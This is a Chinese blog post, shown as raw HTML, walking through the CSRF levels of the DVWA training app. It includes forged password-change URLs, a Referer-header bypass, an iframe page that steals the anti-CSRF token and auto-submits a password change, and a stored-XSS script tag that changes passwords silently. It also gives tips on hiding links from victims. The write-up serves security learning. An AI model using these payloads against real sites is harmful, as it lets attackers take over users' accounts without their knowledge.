<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>DVWA-CSRF | 墨水彩笔</title><meta name="author" content="徐小宇"><meta name="copyright" content="徐小宇"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="CSRF介绍CSRF，全称Cross-site request forgery，翻译过来就是跨站请求伪造，是指利用受害者尚未失效的身份认证信息（cookie、会话等），诱骗其点击恶意链接或者访问包含攻击代码的页面，在受害人不知情的情况下以受害者的身份向（身份认证信息所对应的）服务器发送请求，从而完成非法操作（如转账、改密等）。CSRF与XSS最大的区别就在于，CSRF并没有盗取cookie而是直接">
<meta property="og:type" content="article">
<meta property="og:title" content="DVWA-CSRF">
<meta property="og:url" content="http://example.com/2021/02/22/DVWA-CSRF/index.html">
<meta property="og:site_name" content="墨水彩笔">
<meta property="og:description" content="CSRF介绍CSRF，全称Cross-site request forgery，翻译过来就是跨站请求伪造，是指利用受害者尚未失效的身份认证信息（cookie、会话等），诱骗其点击恶意链接或者访问包含攻击代码的页面，在受害人不知情的情况下以受害者的身份向（身份认证信息所对应的）服务器发送请求，从而完成非法操作（如转账、改密等）。CSRF与XSS最大的区别就在于，CSRF并没有盗取cookie而是直接">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg">
<meta property="article:published_time" content="2021-02-22T07:28:11.000Z">
<meta property="article:modified_time" content="2021-02-24T07:51:47.471Z">
<meta property="article:author" content="徐小宇">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2021/02/22/DVWA-CSRF/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.2.0',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  ClickShowText: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2021-02-24 15:51:47'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(function () {
  window.activateDarkMode = function () {
    document.documentElement.setAttribute('data-theme', 'dark')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
    }
  }
  window.activateLightMode = function () {
    document.documentElement.setAttribute('data-theme', 'light')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
    }
  }

  const autoChangeMode = 'false'
  const t = saveToLocal.get('theme')
  if (autoChangeMode === '1') {
    const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
    const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
    const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

    if (t === undefined) {
      if (isLightMode) activateLightMode()
      else if (isDarkMode) activateDarkMode()
      else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        isNight ? activateDarkMode() : activateLightMode()
      }
      window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
        if (saveToLocal.get('theme') === undefined) {
          e.matches ? activateDarkMode() : activateLightMode()
        }
      })
    } else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else if (autoChangeMode === '2') {
    const now = new Date()
    const hour = now.getHours()
    const isNight = hour <= 6 || hour >= 18
    if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
    else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else {
    if (t === 'dark') activateDarkMode()
    else if (t === 'light') activateLightMode()
  }
})()</script><meta name="generator" content="Hexo 5.2.0"></head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/null" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">Articles</div><div class="length_num">22</div></a></div></div></div><hr/></div></div><div id="body-wrap"><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CSRF%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.</span> <span class="toc-text">CSRF介绍</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Low"><span class="toc-number">2.</span> <span class="toc-text">Low</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9A"><span class="toc-number">2.1.</span> <span class="toc-text">代码分析：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#MEDIUM"><span class="toc-number">3.</span> <span class="toc-text">MEDIUM</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90"><span class="toc-number">3.1.</span> <span class="toc-text">代码分析:</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%95%E4%B8%80%EF%BC%9A"><span class="toc-number">3.1.0.1.</span> <span class="toc-text">法一：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%95%E4%BA%8C%EF%BC%9A"><span class="toc-number">3.1.0.2.</span> <span class="toc-text">法二：</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HIGH"><span class="toc-number">4.</span> <span class="toc-text">HIGH</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9A-1"><span class="toc-number">4.1.</span> <span class="toc-text">代码分析：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#IMPOSSIBLE"><span class="toc-number">5.</span> <span class="toc-text">IMPOSSIBLE</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9A-2"><span class="toc-number">5.1.</span> <span class="toc-text">代码分析：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%B0%8F%E7%BB%93%EF%BC%9A"><span class="toc-number">6.</span> <span class="toc-text">小结：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%8A%80%E5%B7%A7%EF%BC%9A"><span class="toc-number">7.</span> <span class="toc-text">技巧：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80-%E6%88%91%E4%BB%AC%E5%8F%AF%E4%BB%A5%E4%BD%BF%E7%94%A8%E7%9F%AD%E9%93%BE%E6%8E%A5%E6%9D%A5%E9%9A%90%E8%97%8FURL%EF%BC%88%E7%82%B9%E5%87%BB%E7%9F%AD%E9%93%BE%E6%8E%A5%EF%BC%8C%E4%BC%9A%E8%87%AA%E5%8A%A8%E8%B7%B3%E8%BD%AC%E5%88%B0%E7%9C%9F%E5%AE%9E%E7%BD%91%E7%AB%99%EF%BC%89%EF%BC%9A"><span class="toc-number">7.0.1.</span> <span class="toc-text">一.我们可以使用短链接来隐藏URL（点击短链接，会自动跳转到真实网站）：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C-%E6%9E%84%E9%80%A0%E6%94%BB%E5%87%BB%E9%A1%B5%E9%9D%A2"><span class="toc-number">7.0.2.</span> <span class="toc-text">二. 构造攻击页面</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%89-%E5%B0%86CSRF%E4%BB%A3%E7%A0%81%E5%86%99%E5%85%A5XSS%E6%B3%A8%E5%85%A5%E8%8A%82%E7%82%B9%EF%BC%88%E5%AD%98%E5%82%A8%E5%9E%8B%EF%BC%89"><span class="toc-number">7.0.3.</span> <span class="toc-text">三.将CSRF代码写入XSS注入节点（存储型）</span></a></li></ol></li></ol></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">墨水彩笔</a></span><span id="menus"><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">DVWA-CSRF</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2021-02-22T07:28:11.000Z" title="Created 2021-02-22 15:28:11">2021-02-22</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2021-02-24T07:51:47.471Z" title="Updated 2021-02-24 15:51:47">2021-02-24</time></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post View:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h1 id="CSRF介绍"><a href="#CSRF介绍" class="headerlink" title="CSRF介绍"></a>CSRF介绍</h1><p>CSRF，全称Cross-site request forgery，翻译过来就是跨站请求伪造，是指利用受害者<strong>尚未失效的身份认证信息（cookie、会话等）</strong>，诱骗其点击恶意链接或者访问包含攻击代码的页面，在受害人不知情的情况下以受害者的身份向（身份认证信息所对应的）服务器发送请求，从而完成非法操作（如转账、改密等）。CSRF与XSS最大的区别就在于，CSRF并没有盗取cookie而是直接利用。（注意CSRF攻击的条件较为苛刻，必须得在受害者拥有认证身份的同时点开恶意的连接或者访问包含攻击代码的页面才能生效）</p>
<h1 id="Low"><a href="#Low" class="headerlink" title="Low"></a>Low</h1><h2 id="代码分析："><a href="#代码分析：" class="headerlink" title="代码分析："></a>代码分析：</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$pass_new = $_GET[ <span class="string">&#x27;password_new&#x27;</span> ];   $pass_conf = $_GET[ <span class="string">&#x27;password_conf&#x27;</span> ]; </span><br></pre></td></tr></table></figure>

<p>了解到是GET型，且只需要下面的条件成立即可。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$pass_new == $pass_conf</span><br></pre></td></tr></table></figure>

<p>尝试输入一次不同的密码后，URL显示：</p>
<p><a target="_blank" rel="noopener" href="http://localhost/DVWA/vulnerabilities/csrf/?password_new=123&amp;password_conf=456&amp;Change=Change#">http://localhost/DVWA/vulnerabilities/csrf/?password_new=123&amp;password_conf=456&amp;Change=Change#</a></p>
<p>可以看出这个URL意图十分明显我们将其修改为：</p>
<p><a target="_blank" rel="noopener" href="http://localhost/DVWA/vulnerabilities/csrf/?password_new=123&amp;password_conf=123&amp;Change=Change#">http://localhost/DVWA/vulnerabilities/csrf/?password_new=123&amp;password_conf=123&amp;Change=Change#</a></p>
<p>后再访问一下，发现自动跳转到这个界面然后显示红字（这样意图很明显，受害者会察觉）：</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/main/1.png?raw=true" alt="1.png"></p>
<p>接下来我们进一步实验，我们先退出DVWA（验证CSRF的攻击条件是什么）。</p>
<p>然后访问：</p>
<p><a target="_blank" rel="noopener" href="http://localhost/DVWA/vulnerabilities/csrf/?password_new=123&amp;password_conf=123&amp;Change=Change#">http://localhost/DVWA/vulnerabilities/csrf/?password_new=123&amp;password_conf=123&amp;Change=Change#</a></p>
<p>攻击不成功</p>
<p>我们这里也可以推出，是因为条件不成立CSRF攻击时需要获得受害者的认证身份，所以需要受害者先登录DVWA，在不退出的情况下点击连接才有可能进行攻击。</p>
<h1 id="MEDIUM"><a href="#MEDIUM" class="headerlink" title="MEDIUM"></a>MEDIUM</h1><h2 id="代码分析"><a href="#代码分析" class="headerlink" title="代码分析:"></a>代码分析:</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if( eregi( $_SERVER[ &#39;SERVER_NAME&#39; ], $_SERVER[ &#39;HTTP_REFERER&#39; ] ) )</span><br></pre></td></tr></table></figure>

<p>int eregi(string pattern, string string)</p>
<p>检查string中是否含有pattern（不区分大小写），如果有返回True，反之False。</p>
<p>于LOW级别相比，多出了Referer的源地址验证，其实意思是这个referer中只要出现Host就可以正常操作。</p>
<h4 id="法一："><a href="#法一：" class="headerlink" title="法一："></a>法一：</h4><p>首先我们必须得获取受害者的referer值，然后可以重复low级别的链接操作，但需要使用Burp suite 抓包后在包内加入referer认证。</p>
<p>在受害者还保留认证身份的情况下，点开链接：</p>
<p><a target="_blank" rel="noopener" href="http://localhost/DVWA/vulnerabilities/csrf/?password_new=151272053&amp;password_conf=151272053&amp;Change=Change#">http://localhost/DVWA/vulnerabilities/csrf/?password_new=151272053&amp;password_conf=151272053&amp;Change=Change#</a></p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/3.png?raw=true" alt="3.png"></p>
<p>发现少了一行referer值那么我们自己加入，因为这里我们的host显示的是localhost，所以构造referer值为：<a target="_blank" rel="noopener" href="http://localhost/">http://localhost/</a></p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/4.png?raw=true" alt="4.png"></p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/5.png?raw=true" alt="5.png"></p>
<h4 id="法二："><a href="#法二：" class="headerlink" title="法二："></a>法二：</h4><p>技巧三。</p>
<h1 id="HIGH"><a href="#HIGH" class="headerlink" title="HIGH"></a>HIGH</h1><h2 id="代码分析：-1"><a href="#代码分析：-1" class="headerlink" title="代码分析："></a>代码分析：</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">checkToken( $_REQUEST[ <span class="string">&#x27;user_token&#x27;</span> ], $_SESSION[ <span class="string">&#x27;session_token&#x27;</span> ], <span class="string">&#x27;index.php&#x27;</span> )</span><br></pre></td></tr></table></figure>

<p>相比medium级别的referer值，high级别加入了更安全的token值（因为其的随机性）。</p>
<p>接下来的操作我还没学废：</p>
<p>要绕过High级别的反CSRF机制，关键是要获取token，要利用受害者的cookie去修改密码的页面获取关键的token。</p>
<p>试着去构造一个攻击页面，将其放置在攻击者的服务器，引诱受害者访问，从而完成CSRF攻击，下面是代码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">&lt;script type&#x3D;&quot;text&#x2F;javascript&quot;&gt;</span><br><span class="line"></span><br><span class="line">    function attack()</span><br><span class="line"></span><br><span class="line">  &#123;</span><br><span class="line"></span><br><span class="line">   document.getElementsByName(&#39;user_token&#39;)[0].value&#x3D;document.getElementById(&quot;hack&quot;).contentWindow.document.getElementsByName(&#39;user_token&#39;)[0].value;</span><br><span class="line"></span><br><span class="line">  document.getElementById(&quot;transfer&quot;).submit(); </span><br><span class="line"></span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;script&gt;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">&lt;iframe src&#x3D;&quot;http:&#x2F;&#x2F;192.168.153.130&#x2F;dvwa&#x2F;vulnerabilities&#x2F;csrf&quot; id&#x3D;&quot;hack&quot; border&#x3D;&quot;0&quot; style&#x3D;&quot;display:none;&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;iframe&gt;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">&lt;body onload&#x3D;&quot;attack()&quot;&gt;</span><br><span class="line"></span><br><span class="line">  &lt;form method&#x3D;&quot;GET&quot; id&#x3D;&quot;transfer&quot; action&#x3D;&quot;http:&#x2F;&#x2F;192.168.153.130&#x2F;dvwa&#x2F;vulnerabilities&#x2F;csrf&quot;&gt;</span><br><span class="line"></span><br><span class="line">   &lt;input type&#x3D;&quot;hidden&quot; name&#x3D;&quot;password_new&quot; value&#x3D;&quot;password&quot;&gt;</span><br><span class="line"></span><br><span class="line">    &lt;input type&#x3D;&quot;hidden&quot; name&#x3D;&quot;password_conf&quot; value&#x3D;&quot;password&quot;&gt;</span><br><span class="line"></span><br><span class="line">   &lt;input type&#x3D;&quot;hidden&quot; name&#x3D;&quot;user_token&quot; value&#x3D;&quot;&quot;&gt;</span><br><span class="line"></span><br><span class="line">  &lt;input type&#x3D;&quot;hidden&quot; name&#x3D;&quot;Change&quot; value&#x3D;&quot;Change&quot;&gt;</span><br><span class="line"></span><br><span class="line">   &lt;&#x2F;form&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;body&gt;</span><br></pre></td></tr></table></figure>

<p>攻击思路是当受害者点击进入这个页面，脚本会通过一个看不见框架偷偷访问修改密码的页面，获取页面中的token，并向服务器发送改密请求，以完成CSRF攻击。</p>
<p>法二：</p>
<p>在一个拥有XSS漏洞的情况下，使用XSS漏洞弹出Token,然后抓包食用。（没学会）</p>
<h1 id="IMPOSSIBLE"><a href="#IMPOSSIBLE" class="headerlink" title="IMPOSSIBLE"></a>IMPOSSIBLE</h1><h2 id="代码分析：-2"><a href="#代码分析：-2" class="headerlink" title="代码分析："></a>代码分析：</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$pass_curr = $_GET[ <span class="string">&#x27;password_current&#x27;</span> ]; </span><br></pre></td></tr></table></figure>

<p>别的不说这个请输入一下现在的密码是怎么回事，如果我知道现在的秘密还要修改吗？</p>
<h1 id="小结："><a href="#小结：" class="headerlink" title="小结："></a>小结：</h1><p>一.攻击的条件很苛刻，必须在受害者的认证身份未失效前进行。</p>
<p>二.我们现在使用的URL链接意图明显，容易被识破。</p>
<p>三.攻击后放回的页面，使受害者第一时间就明白被攻击。</p>
<h1 id="技巧："><a href="#技巧：" class="headerlink" title="技巧："></a>技巧：</h1><h3 id="一-我们可以使用短链接来隐藏URL（点击短链接，会自动跳转到真实网站）："><a href="#一-我们可以使用短链接来隐藏URL（点击短链接，会自动跳转到真实网站）：" class="headerlink" title="一.我们可以使用短链接来隐藏URL（点击短链接，会自动跳转到真实网站）："></a>一.我们可以使用短链接来隐藏URL（点击短链接，会自动跳转到真实网站）：<img src="https://image.3001.net/images/20161031/14778954786668.png!small" alt="1.png"></h3><p>但该网站已经不允许私人用户使用了。</p>
<h3 id="二-构造攻击页面"><a href="#二-构造攻击页面" class="headerlink" title="二. 构造攻击页面"></a>二. 构造攻击页面</h3><p>现实攻击场景下，这种方法需要事先在公网上传一个攻击页面，诱骗受害者去访问，真正能够在受害者不知情的情况下完成CSRF攻击。</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/6.png?raw=true" alt="6.png"></p>
<h3 id="三-将CSRF代码写入XSS注入节点（存储型）"><a href="#三-将CSRF代码写入XSS注入节点（存储型）" class="headerlink" title="三.将CSRF代码写入XSS注入节点（存储型）"></a>三.将CSRF代码写入XSS注入节点（存储型）</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script</span><br><span class="line"></span><br><span class="line">src&#x3D;&quot;http:&#x2F;&#x2F;localhost&#x2F;DVWA&#x2F;vulnerabilities&#x2F;csrf&#x2F;?password_new&#x3D;hack&amp;password_conf&#x3D;hack&amp;Change&#x3D;Change#&quot;&gt;&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<p>就像DVWA中我们去XSS（stored）中写下这一段代码，就神不知鬼不觉的改变了密码。没有任何的响应，且留言板中的内容显示的虽然奇怪但不会让人容易察觉。</p>
<p><img src="https://github.com/xuxiaoyu233/xuxiaoyu233.github.io/blob/picture/7.png?raw=true" alt="7.png"></p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">徐小宇</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2021/02/22/DVWA-CSRF/">http://example.com/2021/02/22/DVWA-CSRF/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2021/02/26/DVWA-File/"><img class="prev-cover" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">DVWA-File</div></div></a></div><div class="next-post pull-right"><a href="/2021/02/21/DVWA-XSS/"><img class="next-cover" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">DVWA-XSS</div></div></a></div></nav></article></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2021 By 徐小宇</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><i class="fas fa-arrow-up"></i></button></div></section><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><div class="js-pjax"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></div></body></html>